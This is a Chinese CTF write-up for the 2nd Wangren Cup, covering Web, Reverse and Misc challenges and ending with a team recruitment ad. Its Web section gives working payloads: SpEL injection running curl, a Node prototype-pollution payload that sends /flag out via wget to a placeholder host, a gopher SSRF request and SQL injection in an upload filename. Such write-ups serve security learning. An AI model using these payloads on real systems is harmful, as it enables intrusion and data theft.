第二届网刃杯CTF-wp

Web

ez_java

package me.su;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;
import java.io.IOException;
import java.util.regex.Pattern;

public class demo {
    public static void main(String[] args) {
        String name = "#{new ProcessBuilder(new String[]{\"curl\",\"-o\",\"/tmp/1\",\"vps:901\"}).start()}";
        if (blackMatch(name)) {
            System.out.println("die");
            return;
        }
        System.out.println(name);
        System.out.println(getAdvanceValue(name));
    }
    public static String getAdvanceValue(String val) {
        return new SpelExpressionParser().parseExpression(val, new TemplateParserContext()).getValue(new StandardEvaluationContext()).toString();
    }
    private static boolean blackMatch(String val) {
        for (String keyword : getBlacklist()) {
            if (Pattern.compile(keyword, 34).matcher(val).find()) {
                return true;
            }
        }
        return false;
    }
    private static String[] getBlacklist() {
        return new String[]{"java.+lang", "Runtime", "exec.*\\("};
    }
}

ezjs

原题，来自https://www.anquanke.com/post/id/248170#h3-7
跟原题相比只是增加了一个黑名单过滤，测试发现过滤了return、execSync、flag、sh、rm等等，其中return被过滤所以本题没办法直接回显了，因此本题变成一个无回显情况下的命令执行
最终使用如下payload利用wget外带拿到flag：
flag{n0D3_1s_V3rY_v3Ry_very_v3rY_Fun_1sNt_it}

{"__proto__":{"sourceURL":"\u000aglobal.process.mainModule.constructor._load('child_process')['execSyn\\x63']('busybox\\x20\\x77get\\x20ip:port/`tac\\x20/.\\x66lag|base64`')//"}}

Sign_in

http://124.220.9.19:8091/?url=gopher://172.73.23.100:80/_%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%33%41%38%30%25%30%44%25%30%41%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41%25%30%44%25%30%41

import urllib.parse
test =\
"""POST /?a=1 HTTP/1.1
Host: 172.73.23.100:80
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Referer: bolean.club
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
b=1
"""  
#注意后面一定要有回车，回车结尾表示http请求结束
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
result = '_'+new
print(result)

upload

POST / HTTP/1.1
Host:
124.220.9.19:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1470817923043980331208184612
Content-Length: 391
Origin:
http://124.220.9.19:8001
Connection: close

Referer:
http://124.220.9.19:8001/
Upgrade-Insecure-Requests: 1
- ----------------------------1470817923043980331208184612
Content-Disposition: form-data; name="upfile"; filename="1a' or updatexml(1,concat(0x7e,(select substr(flag,16,32) from flag)),0) or'"
Content-Type: ctf
<FilesMatch "1.gif">
SetHandler application/x-httpd-php
AddHandler php5-script .gif
</FilesMatch>
- ----------------------------1470817923043980331208184612--

Re

ez_algorithm

繁琐的一些移位，置换加密

char *__fastcall encryption(char *a1)
{
  int v1; // eax
  char v2; // al
  char v3; // al
  __int64 v4; // kr00_8
  char v5; // al
  char v6; // al
  int v7; // eax
  char v8; // al
  char v9; // al
  char v10; // al
  char v11; // al
  char v12; // al
  char v14[1012]; // [rsp+20h] [rbp-60h] BYREF
  int v15; // [rsp+414h] [rbp+394h]
  const char *v16; // [rsp+418h] [rbp+398h]
  const char *small; // [rsp+420h] [rbp+3A0h]
  int v18; // [rsp+42Ch] [rbp+3ACh]
  char *v19; // [rsp+430h] [rbp+3B0h]
  char *v20; // [rsp+438h] [rbp+3B8h]

  small = xyp2();
  v16 = xyp3();
  v20 = v14;
  v19 = a1;
  v18 = 0;
  v15 = 1;
  while ( v18 < strlen(a1) )
  {
    if ( *v19 <= 64 || *v19 > 90 )
    {
      if ( *v19 <= 96 || *v19 > 122 )
      {
        if ( *v19 == '_' )
        {
          switch ( v15 + rand() % 7 )
          {
            case 0:
              *v20 = ':';
              break;
            case 1:
              *v20 = '&';
              break;
            case 2:
              *v20 = '+';
              break;
            case 3:
              *v20 = '*';
              break;
            case 4:
              *v20 = '\\\\';
              break;
            case 5:
              *v20 = '?';
              break;
            case 6:
              *v20 = '$';
              break;
            case 7:
              *v20 = '#';
              break;
            default:
              break;
          }
        }
        else if ( *v19 <= 47 || *v19 > 57 )
        {
          *v20 = *v19;
        }
        else
        {
          v12 = encryption2(*v19);
          *v20 = v12;
        }
      }
      else                                      // 小写字母
      {
        v7 = v18 % 4;
        if ( v18 % 4 == 1 )
        {
          v9 = encryption2(small[(*v19 - 97) * (v18 % 4)]);
          *v20 = v9;
        }
        else if ( v7 > 1 )
        {
          if ( v7 == 2 )
          {
            v10 = encryption2(small[(*v19 - 97) ^ (v18 % 4)]);
            *v20 = v10;
          }
          else if ( v7 == 3 )
          {
            v11 = encryption2(small[*v19 - 97 + v18 % 4]);
            *v20 = v11;
          }
        }
        else if ( !v7 )
        {
          v8 = encryption2(small[*v19 - 97 - v18 % 4]);
          *v20 = v8;
        }
      }
    }
    else                                        // 大写字母
    {
      v1 = v18 % 4;
      if ( v18 % 4 == 1 )
      {
        v3 = encryption2(v16[*v19 - 65 + v18 % 4]);
        *v20 = v3;
      }
      else if ( v1 > 1 )
      {
        if ( v1 == 2 )
        {
          v4 = v18 * (*v19 - 65);
          v5 = encryption2(v16[(((HIDWORD(v4) >> 30) + (unsigned __int8)v18 * (*v19 - 65)) & 3) - (HIDWORD(v4) >> 30)]);
          *v20 = v5;
        }
        else if ( v1 == 3 )
        {
          v6 = encryption2(v16[(*v19 - 65) ^ (v18 % 4)]);
          *v20 = v6;
        }
      }
      else if ( !v1 )
      {
        v2 = encryption2(v16[*v19 - 65 - v18 % 4]);
        *v20 = v2;
      }
    }
    ++v18;
    ++v19;
    ++v20;
  }
  return v14;
}

我们根据程序对数字，大写字母，小写字母的不同处理来写处解密脚本：

s = list(b"WQUTYBXDOFVRKHCGSMLJAZENIP")
t = list(b"gskfcqtioutrvenjwlpmadybhx")
enc = "BRUF{E6oU9Ci#J9+6nWAhwMR9n:}"
      "BRUF{E6oU9Ci#J9+6nWAhwMR9n:}"
enc = list(enc.encode())
for i in range(28):
    if enc[i] >= 65 and enc[i] <= 90:
        index = s.index(enc[i])
        if i%4 == 0:
            tmp = index+97
        elif i%4 == 1:
            tmp = index+97
        elif i%4 == 2:
            tmp = (index^2)+97
        else:
            tmp = (index-3)+97
        enc[i] = tmp
    elif enc[i] >= 97 and enc[i] <= 122:
        index = t.index(enc[i])
        if i%4 == 0:
            tmp = index+65
        elif i%4 == 1:
            tmp = (index-1)+65
        elif i%4 == 2:
            tmp = (index^2)+65
        else:
            tmp = (index^3)+65
        enc[i] = tmp
    elif enc[i] >= 48 and enc[i] <= 57:
        tmp = 105-enc[i]
        enc[i] = tmp

print(bytes(enc))
#flag{w3Lc0mE#t0+3NcrYPti0N:}

最后这个是多解的，根据flag表示的意思，推出有 _ 进行连接。
组合得到flag
flag{w3Lc0mE_t0_3NcrYPti0N:}

定时启动

修改系统时间在2022-04-24 09:09:09附近，不断运行squid程序，且运行后删除在当前目录生成的Readme.txt（因为测试出程序是通过判断当前目录下有无Readme.txt来判断程序是不是第二次运行）
多次尝试得到flag

Re_function

在压缩包的注释信息中有一段数据，复制下来发现是一张图片，从图片最后看见一个base编码，解码即是压缩包密码。

第一个程序是加密程序

解密得到：SqcTSxCxSAwHGm/JvxQrvxiNjR9=

>>> s = [0x64, 0x71, 0x54, 0x54, 0x64, 0x78, 0x74, 0x78, 0x64, 0x41, 0x40, 0x48, 0x70, 0x6D, 0x18, 0x4A, 0x41, 0x78, 0x66, 0x72, 0x41, 0x78, 0x5E, 0x4E, 0x5D, 0x52, 0x0E, 0x3D]
>>> s = [s[i]^0x37 for i in range(0, 28, 2)]
>>> s
[83, 99, 83, 67, 83, 119, 71, 47, 118, 81, 118, 105, 106, 57]
>>> bytes(s)
b'ScSCSwG/vQvij9'
>>> s = [0x64, 0x71, 0x54, 0x54, 0x64, 0x78, 0x74, 0x78, 0x64, 0x41, 0x40, 0x48, 0x70, 0x6D, 0x18, 0x4A, 0x41, 0x78, 0x66, 0x72, 0x41, 0x78, 0x5E, 0x4E, 0x5D, 0x52, 0x0E, 0x3D]
>>> for i in range(28):
...     if i%2 == 0:
...             s[i] ^= 0x37
...
>>> s
[83, 113, 99, 84, 83, 120, 67, 120, 83, 65, 119, 72, 71, 109, 47, 74, 118, 120, 81, 114, 118, 120, 105, 78, 106, 82, 57, 61]
>>> bytes(s)
b'SqcTSxCxSAwHGm/JvxQrvxiNjR9='

然后第二个程序是一个变表base64解码，把第一个程序解出的数据进行一个变表base64解码就是flag。

freestyle

逆向fun1 与fun2得到两次输入要满足以下条件fun1:( 4 * (3 * atoi(s) / 9 - 9) != 4400 )fun2:( 2 * (atoi(s) % 56) != 98 )并且题目提示需要求出MD5值写出脚本 得到key。

key1=(4400/4+9)*3
key2=(98/2)+n*56
key=str(key1)[:-2]+str(key2)[:-2]
MD5：
import hashlib
def getmd5(str):
    m = hashlib.md5()
    m.update(str.encode("utf-8"))
    return m.hexdigest()
for i in range (1,8):
    key1=(4400/4+9)*3
    key2=(98/2)+i*56
    print(key1)
    print(key2)
    flag=''
    key=str(key1)[:-2]+str(key2)[:-2]
    print(getmd5(key))

Misc

easyiec

拿到流量包，直接strings:strings
./easyiec/easyiec.pcap |grep 'flag’得到flagflag{e45y_1eci04}

Tip

你是否想要加入一个安全团
拥有更好的学习氛围？
那就加入EDI安全，这里门槛不是很高，但师傅们经验丰富，可以带着你一起从基础开始，只要你有持之以恒努力的决心
EDI安全的CTF战队经常参与各大CTF比赛，了解CTF赛事，我们在为打造安全圈好的技术氛围而努力，这里绝对是你学习技术的好地方。这里门槛不是很高，但师傅们经验丰富，可以带着你一起从基础开始，只要你有持之以恒努力的决心，下一个CTF大牛就是你。
欢迎各位大佬小白入驻，大家一起打CTF，一起进步。
我们在挖掘，不让你埋没！
你的加入可以给我们带来新的活力，我们同样也可以赠你无限的发展空间。
有意向的师傅请联系邮箱root@edisec.net（带上自己的简历，简历内容包括自己的学习方向，学习经历等）